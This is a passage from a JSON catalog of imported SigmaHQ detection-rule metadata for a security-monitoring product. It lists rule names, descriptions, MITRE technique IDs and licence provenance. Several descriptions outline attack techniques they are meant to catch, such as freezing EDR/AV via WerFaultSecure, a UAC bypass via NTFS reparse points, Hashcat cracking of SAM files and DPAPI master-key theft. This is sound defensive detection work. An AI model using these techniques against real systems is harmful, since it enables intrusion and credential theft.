attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-vsftpd-error-messages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml" } }, { "id": "sigmahq-sigma-378a05d8-963c-46c9-bcce-13c7657eac99", "type": "detection", "name": "Potentially Suspicious Electron Application CommandLine", "description": "Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-electron-application-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "378a05d8-963c-46c9-bcce-13c7657eac99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml" } }, { "id": "sigmahq-sigma-379fa130-190e-4c3f-b7bc-6c8e834485f3", "type": "detection", "name": "File Deletion Via Del", "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-deletion-via-del.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml" } }, { "id": "sigmahq-sigma-37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "type": "detection", "name": "Allow RDP Remote Assistance Feature", "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/allow-rdp-remote-assistance-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" } }, { "id": "sigmahq-sigma-37c1333a-a0db-48be-b64b-7393b2386e3b", "type": "detection", "name": "Hacktool Execution - PE Metadata", "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-execution-pe-metadata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37c1333a-a0db-48be-b64b-7393b2386e3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml" } }, { "id": "sigmahq-sigma-37db85d1-b089-490a-a59a-c7b6f984f480", "type": "detection", "name": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-discovery-via-default-driver-altitude-using-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37db85d1-b089-490a-a59a-c7b6f984f480", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" } }, { "id": "sigmahq-sigma-37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1", "type": "detection", "name": "Outbound Network Connection Initiated By Microsoft Dialer", "description": "Detects outbound network connection initiated by Microsoft Dialer.\nThe Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.\nThis is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is \"Rhadamanthys\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-initiated-by-microsoft-dialer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml" } }, { "id": "sigmahq-sigma-37e8d358-6408-4853-82f4-98333fca7014", "type": "detection", "name": "Remote Access Tool - NetSupport Execution From Unusual Location", "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-netsupport-execution-from-unusual-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37e8d358-6408-4853-82f4-98333fca7014", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" } }, { "id": "sigmahq-sigma-38360161-76c4-4283-842e-efcf997dafc8", "type": "detection", "name": "Suspicious Login Activity Classified By Google", "description": "Detects Google Workspace login activity that's classified as suspicious by Google.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-login-activity-classified-by-google.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38360161-76c4-4283-842e-efcf997dafc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/login/gcp_gworkspace_suspicious_login.yml" } }, { "id": "sigmahq-sigma-38646daa-e78f-4ace-9de0-55547b2d30da", "type": "detection", "name": "PUA - Seatbelt Execution", "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1526", "T1087", "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-seatbelt-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38646daa-e78f-4ace-9de0-55547b2d30da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" } }, { "id": "sigmahq-sigma-387df17d-3b04-448f-8669-9e7fd5e5fd8c", "type": "detection", "name": "Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze", "description": "Detects process access events where WerFaultSecure accesses MsMpEng.exe with dbgcore.dll or dbghelp.dll in the call trace, indicating potential EDR freeze techniques.\nThis technique leverages WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to call MiniDumpWriteDump and suspend EDR/AV processes, allowing malicious activity to execute undetected during the suspension period.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-access-of-msmpeng-by-werfaultsecure-edr-freeze.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "387df17d-3b04-448f-8669-9e7fd5e5fd8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access.yml" } }, { "id": "sigmahq-sigma-3883d9a0-fd0f-440f-afbb-445a2a799bb8", "type": "detection", "name": "Github Secret Scanning Feature Disabled", "description": "Detects if the secret scanning feature is disabled for an enterprise or repository.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-secret-scanning-feature-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3883d9a0-fd0f-440f-afbb-445a2a799bb8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_secret_scanning_feature_disabled.yml" } }, { "id": "sigmahq-sigma-38879043-7e1e-47a9-8d46-6bec88e201df", "type": "detection", "name": "Potential Persistence Attempt Via Existing Service Tampering", "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-attempt-via-existing-service-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38879043-7e1e-47a9-8d46-6bec88e201df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml" } }, { "id": "sigmahq-sigma-38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8", "type": "detection", "name": "HKTL - SharpSuccessor Privilege Escalation Tool Execution", "description": "Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.\nSuccessful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hktl-sharpsuccessor-privilege-escalation-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpsuccessor_execution.yml" } }, { "id": "sigmahq-sigma-38a7625e-b2cb-485d-b83d-aff137d859f4", "type": "detection", "name": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module", "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remotefxvgpudisablement-exe-abuse-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-38e7f511-3f74-41d4-836e-f57dfa18eead", "type": "detection", "name": "Potential Malicious Usage of CloudTrail System Manager", "description": "Detect when System Manager successfully executes commands against an instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-malicious-usage-of-cloudtrail-system-manager.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38e7f511-3f74-41d4-836e-f57dfa18eead", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml" } }, { "id": "sigmahq-sigma-38eb1dbb-011f-40b1-a126-cf03a0210563", "type": "detection", "name": "ESXi Syslog Configuration Change Via ESXCLI", "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1690", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-syslog-configuration-change-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38eb1dbb-011f-40b1-a126-cf03a0210563", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml" } }, { "id": "sigmahq-sigma-39019a4e-317f-4ce3-ae63-309a8c6b53c5", "type": "detection", "name": "Suspicious Scheduled Task Creation Involving Temp Folder", "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-creation-involving-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml" } }, { "id": "sigmahq-sigma-3908d64a-3c06-4091-b503-b3a94424533b", "type": "detection", "name": "New Github Organization Member Added", "description": "Detects when a new member is added or invited to a github organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-github-organization-member-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3908d64a-3c06-4091-b503-b3a94424533b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_new_org_member.yml" } }, { "id": "sigmahq-sigma-3940b5f1-3f46-44aa-b746-ebe615b879e0", "type": "detection", "name": "AWS Route 53 Domain Transfer Lock Disabled", "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-route-53-domain-transfer-lock-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3940b5f1-3f46-44aa-b746-ebe615b879e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml" } }, { "id": "sigmahq-sigma-395907ee-96e5-4666-af2e-2ca91688e151", "type": "detection", "name": "Wab Execution From Non Default Location", "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wab-execution-from-non-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "395907ee-96e5-4666-af2e-2ca91688e151", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" } }, { "id": "sigmahq-sigma-39698b3f-da92-4bc6-bfb5-645a98386e45", "type": "detection", "name": "Win Susp Computer Name Containing Samtheadmin", "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/win-susp-computer-name-containing-samtheadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_computer_name.yml" } }, { "id": "sigmahq-sigma-396ae3eb-4174-4b9b-880e-dc0364d78a19", "type": "detection", "name": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-loadmacroprovideronboot-setting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" } }, { "id": "sigmahq-sigma-396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "type": "detection", "name": "Suspicious Child Process Of Wermgr.EXE", "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) child process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-wermgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml" } }, { "id": "sigmahq-sigma-39a80702-d7ca-4a83-b776-525b1f86a36d", "type": "detection", "name": "Potential Secure Deletion with SDelete", "description": "Detects files that have extensions commonly seen while SDelete is used to wipe files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1027.005", "T1485", "T1553.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-secure-deletion-with-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39a80702-d7ca-4a83-b776-525b1f86a36d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_sdelete_potential_secure_deletion.yml" } }, { "id": "sigmahq-sigma-39a94fd1-8c9a-4ff6-bf22-c058762f8014", "type": "detection", "name": "DPAPI Domain Master Key Backup Attempt", "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dpapi-domain-master-key-backup-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" } }, { "id": "sigmahq-sigma-39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "type": "detection", "name": "HackTool - Hashcat Password Cracker Execution", "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-hashcat-password-cracker-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" } }, { "id": "sigmahq-sigma-39b64854-5497-4b57-a448-40977b8c9679", "type": "detection", "name": "Malicious Driver Load By Name", "description": "Detects loading of known malicious drivers via the file name of the drivers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-driver-load-by-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39b64854-5497-4b57-a448-40977b8c9679", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_mal_drivers_names.yml" } }, { "id": "sigmahq-sigma-39c9f26d-6e3b-4dbb-9c7a-4154b0281112", "type": "detection", "name": "AWS Bucket Deleted", "description": "Detects the deletion of S3 buckets in AWS CloudTrail logs.\nMonitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-bucket-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39c9f26d-6e3b-4dbb-9c7a-4154b0281112", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_bucket_deleted.yml" } }, { "id": "sigmahq-sigma-39ed3c80-e6a1-431b-9df3-911ac53d08a7", "type": "detection", "name": "UAC Bypass Using NTFS Reparse Point - Process", "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ntfs-reparse-point-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 